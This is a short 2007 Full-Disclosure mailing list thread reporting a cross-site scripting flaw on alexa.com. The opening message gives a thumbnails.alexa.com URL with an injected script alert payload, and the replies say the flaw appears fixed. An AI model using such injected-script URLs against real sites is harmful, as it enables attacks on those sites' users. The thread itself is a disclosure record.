[Full-disclosure] alexa.com XSS
cardoso
cardosolistas at contraditorium.com
Wed May 30 01:06:30 BST 2007
Fixed. Worked for a while.
FF 1.5.0.11, Vista RC2 (yes, I know)
On Tue, 29 May 2007 16:44:47 -0400
kefka <kefka at kevinbeardsucks.com> wrote:
k> Seems fixed or doesn't work in FireFox 1.5.0.11
k> -----------------------
k> MC Iglo wrote:
k> > http://thumbnails.alexa.com/update_thumbnail?url=%3Cscript%3Ealert(%22alexa%20sucks%22)%3C/script%3E
k> >
k> > is there more to say?
k> >
k> > _______________________________________________
k> > Full-Disclosure - We believe in it.
k> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
k> > Hosted and sponsored by Secunia - http://secunia.com/
k> >
k> >
k>
k> _______________________________________________
k> Full-Disclosure - We believe in it.
k> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
k> Hosted and sponsored by Secunia - http://secunia.com/
-------------------------------------------------------------
Carlos Cardoso
http://www.carloscardoso.com <== blog semi-pessoal
http://www.contraditorium.com <== ProBlogging e cultura digital
"You lost today, kid. But that doesn't mean you have to like it"
Full-Disclosure is hosted and sponsored by Secunia.